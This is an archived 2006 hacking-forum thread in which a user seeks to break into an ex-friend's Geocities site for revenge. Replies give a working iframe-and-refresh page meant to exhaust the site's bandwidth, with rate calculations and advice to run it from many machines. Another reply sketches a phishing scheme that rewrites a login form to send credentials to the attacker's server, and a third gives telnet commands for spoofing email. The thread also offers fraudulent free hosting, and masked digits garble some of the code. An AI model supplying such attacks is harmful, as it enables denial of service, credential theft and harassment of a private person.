PDA

View Full Version : Hacking a website



Luckydog
11-16-2006, 03:42 PM
Hi there... was wondering if anyone could help me. I'm not a hacker myself, however I was wondering if this is possible, and maybe if I can hire one. I would like to hack into a geocities website. An ex-friend is using it to say all kinds of nasty things about me and is just doing me wrong. I would like to pay him back. I was wondering if someone could obtain the password for the administration of his site so I could.... have some fun. Please email me or respond here.... as I said I am willing to pay. serious inquiries only.

Halla
11-16-2006, 04:39 PM
Honestly, Im not sure how I would go about that offhand.. but there are ways to shut the site down...

Im not familiar/w geocities so I took a look, and Im guessing your ex friend isnt paying, thus using the free package. The easiest way to tell this I can see from my whopping 2 minutes of looking is that if theres an ad on the site (banner, popup, whatever they use) then its the free one.

That being the case, I checked out the package details and see:
* GB/month Data transfer (bandwidth)

and in case you dont know:


Data transfer (bandwidth)
Whenever a visitor comes to your site, data is sent from our web servers to your visitor's computer. This data can be composed of web pages, images, movies, sound files, programs, compressed files, or anything else on your site that can be viewed or downloaded by visitors. When all this requested data is added up, then you have your total data transfer. The more visitors you have, the higher a data transfer limit you'll need.

so if I wanted a free geocities site to drop off the face of the planet, Id simply suck up all the available bandwidth, which is only * gig per mo.

How?
A few ways are effective. I have a feeling you're not in the programming field so my s***estions are based on simplicity.

*. One way would be to download any files or pictures on the site over and over again until it reached the limit and the site was no longer available. You could make a program that does this, or even do it manually...

2. An easier way to do this involves some html, but its easier overall and accomplishes the same thing. I turn your attention to the above quote:

The more visitors you have, the higher a data transfer limit you'll need.

What you would do is to make a webpage that hit his site hundreds or thousands of times, as if it were visitors. This way even the smallest files (say an html page at 22k) can add up quick.

If you dont know any simple html, heres a heads up:

<html>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
</html>

what that does is open up *0 little windows that point to that site. You can do more than *0, but I used that number for easy math. I wouldnt do too many as you can crash your browser or lag out your connection depending on what it is.... anyway...

so once you've got that working add this to the top of the code under <html>:
<head>
<meta http-equiv="re*****" content="*0">
</head>

so what that does is re*****es the page every *0 seconds. You may want to change the settings on your browser to have a small cache so it forces the page to reload each time rather than depend on tmp files from your PC.

anyways, what you come up with is this:

<html>
<head>
<meta http-equiv="re*****" content="*0">
</head>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
<iframe src=http://geocities.com/whatever width=5 height=5></iframe>
</html>

so you are hitting the page *0 times every *0 seconds. Depending on the content of the page (pics, etc) this will eventually kill that * gig of bandwidth... do the math.

lets say the site only has text and the page is small in size, say 5k.

well all know:
*024k = *M
*024M = *G

so about 205 hits will = *M
which you should get to in about * and a half minutes. Thus in about 60 hours thats a gig, and following that, the site should reach its bandwidth limit in *80 hours... which is about a week (7.5 days)

ok, ok, dont panic yet. I know thats too long for you to wait, even though that = 75% downtime. Patience.

If you use 20 iframes, that number cuts down to *.75 days, and using 40 iframes its *.8 days. Or maybe you can do a re***** every 5 instead of *0 seconds... play with it and see what the best you can do it. Personally, I could probably hit the * gig mark in about 2 hours easily.

Now just think outside the box.
Maybe your connection or browser doesnt want to handle 40 iframes or something. No problem... just take your handy dandy html file with you to school or the library or friends house and run it from there as well. As long as your home PC still has the page up and running (lets use the *0 iframes for this example) whenever you run it from another location, thats the equivelant of doubling it.

Heck, you could set a PC to active desktop and put the file into the desktop background if you wanted...

anyways, you get the idea.
Its simple... in fact bordering on lame simple.
So simple in fact, its kind of scary... but it does work. Ive tested it myself.

[edit]
oh you want to pay? lol. make that check payable to halla / informationleak.com
:)

Luckydog
11-16-2006, 04:52 PM
thanks for the s***estion sounds nice...., however I know he is paying the 5 bucks a month for the extra bandwidth.

Halla
11-16-2006, 05:37 PM
ok, so check that to 25 gig.
whats the page? Im curious as hell now.

Moonbat
11-16-2006, 10:13 PM
Thanks Halla, I just learned something new.

LuckyDog, what you could do is just hit up computer labs or whatever and do what he said, all those computers will make it go a lot faster.

Ezekiel
11-17-2006, 04:17 AM
But what happens when the month ends? You're back where you started.

Geocities is owned by Yahoo, so all accounts use a Yahoo address. What I'm thinking is you could spoof an email from geocities to the admin, saying he has to go to the login page and enter specific code to retain his account. The code is some URL javascript which uses the HTML DOM to modify the form action parameter to a script on your own server. He (and his username & password) gets redirected to your server, you write his details to file, and resubmit him on his merry way. Can anyone see a flaw in this plan?

Moonbat
11-17-2006, 05:25 PM
As far as I know, I've been unable to spoof from any SMTP server. I've tried the mainstream ones like Yahoo, Hotmail, and Gmail. I Googled multiple lists of SMTP servers and tried all to no avail. If you could name one that works, I'd appreciate it.

Ezekiel
11-17-2006, 05:47 PM
As far as I know, I've been unable to spoof from any SMTP server. I've tried the mainstream ones like Yahoo, Hotmail, and Gmail. I Googled multiple lists of SMTP servers and tried all to no avail. If you could name one that works, I'd appreciate it.

I've spoofed emails from both Hotmail and Gmail's SMTP servers, so you're obviously doing something wrong. If you can't spoof emails from a SMTP server, you can't send emails at all.

You can use this command to look up the mail server of a specified domain (don't enter www.yourdomain.com, either):

nslookup -querytype=mx hotmail.com

And connect to it from command prompt/shell:


telnet mx*.hotmail.com 25

helo mx*.hotmail.com

mail from: admin@hotmail.com

rcpt to: recipient@hotmail.com

data

To: recipient@hotmail.com
From: admin@hotmail.com
Subject: Testing...

This is a test email. The dot below indicates the end of the email, and the quit command terminates my connection.

.

quit

You need to remember to include your own email headers, and of course check spam folders for the email.

Moonbat
11-17-2006, 06:37 PM
No wonder, I kept typing helo without any server name. I feel really stupid.

Halla
11-19-2006, 06:03 PM
mike>
only flaw I see with that is the user doing a shit job and the target not going for it as well as the potential for the target to recognize the spoofed url

I see flaws in my method as well, more than you mention, however I mentioned and went over it because:
*. Doesnt rely on targets actions
2. Uses 'legitimate' traffic
*. Can be applied to other situations

Not to say thats the best way to go about it either but its cool we show different methods.

Ezekiel
11-19-2006, 06:30 PM
On a slightly related note, if anyone wants hosting with these specs:

Disk Space 2400 MB
Monthly Transfer *00 GB
SMTP Support Yes
POP* Support Yes
Email Addresses 20
PHP Support Yes
MySQL Databases 20 Dbs
FTP Access Yes
File Manager Yes
Forced Ads No

...I can show you how to get it for free. It is, however, highly illegal, so I only recommend using it for 'disposable storage', which you can leave when the time comes.

Moonbat
11-19-2006, 09:46 PM
SMTP support? Will that give you your own SMTP server, like yoursite.geocities.com? If that's the case, then I would like to know how to get it for free. But otherwise I would like to know just for educational purposes anyway.

BTW, I've sent a spoofed email to a Hotmail account (mine) and it said something along the lines of "The Sender ID could not be verified." I'm pretty sure someone would be suspicious of that.

Ezekiel
11-20-2006, 12:10 PM
SMTP support? Will that give you your own SMTP server, like yoursite.geocities.com? If that's the case, then I would like to know how to get it for free. But otherwise I would like to know just for educational purposes anyway.

It think it does, but you never really need a SMTP server to send emails or spoof emails - you can just directly connect to the target domain's server. You only ever need a SMTP server as a way of delivering email to email servers, accessed by POP* or IMAP. Sort of hard to explain.

As for the free hosting, I need to reiterate the fact that it is highly illegal and is fraud which steals over $20 per month. If anyone is still interested, they need to send me a PM expressing this interest as it can't be discussed here - certain hosting companies would rip me apart legally if I posted it here.


BTW, I've sent a spoofed email to a Hotmail account (mine) and it said something along the lines of "The Sender ID could not be verified." I'm pretty sure someone would be suspicious of that.

Yeah, that can be a problem, but people usually ignore such notices. Than can occur legitimately when something like a forum or CMS system sends emails on the admin's behalf.

Fortunately, Sender ID is a Microsoft specific invention and I don't think other services employ anything like it.

Newby_Programme
11-20-2006, 11:49 PM
On a slightly related note, if anyone wants hosting with these specs:

Disk Space 2400 MB
Monthly Transfer *00 GB
SMTP Support Yes
POP* Support Yes
Email Addresses 20
PHP Support Yes
MySQL Databases 20 Dbs
FTP Access Yes
File Manager Yes
Forced Ads No

...I can show you how to get it for free. It is, however, highly illegal, so I only recommend using it for 'disposable storage', which you can leave when the time comes.

How illegal would yhou say this is? 5 years 2 years? $500 fine?

Troll
11-21-2006, 12:43 AM
"it's only illegal if you get caught" :p

trinoid
11-21-2006, 01:29 AM
can someone check out my site i really want some feedback http://www.z-zap.com

Ezekiel
11-21-2006, 01:25 PM
How illegal would yhou say this is? 5 years 2 years? $500 fine?

It's fraud. You are stealing over $200 per year. It's very illegal.